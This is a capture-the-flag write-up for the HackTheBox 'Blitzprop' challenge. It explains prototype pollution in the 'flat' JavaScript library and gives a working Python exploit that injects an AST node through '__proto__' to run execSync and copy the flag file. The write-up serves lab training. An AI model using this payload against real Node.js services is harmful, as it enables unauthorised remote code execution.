Skip to content

HackTheBox Cyber Apocalypse CTF 2021: Blitzprop

TL;DR

  • The backend uses the vulnerable flat JavaScript library.
  • User-controlled JSON keys allow prototype pollution via __proto__.
  • Polluting the object graph lets us inject arbitrary AST nodes.
  • A malicious AST node executes child_process.execSync.
  • The flag is copied into the public /static directory.
  • A second request retrieves the flag directly.

Video Walkthrough

HackTheBox Cyber Apocalypse CTF 2021 Blitzprop prototype pollution RCE video walkthrough

Challenge Description

To exploit this, you need to use a ‘prototype pollution’ vulnerability within the flat library in order to gain RCE against the target. This requires a request to the server to 'pollute' the JavaScript objects, then a second request to trigger the payload. Overall, it was a really interesting box!

Solution

from pwn import *
import requests

TARGET_URL = 'http://188.166.172.13:31177'

# https://blog.p6.is/AST-Injection/
result = requests.post(TARGET_URL + '/api/submit', json={
    "song.name": "The Goose went wild",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync(`cp flagz8gWv static/flag`)"
    }
})

flag = requests.get(TARGET_URL + '/static/flag').text
success(flag)

Flag: CHTB{p0llute_with_styl3}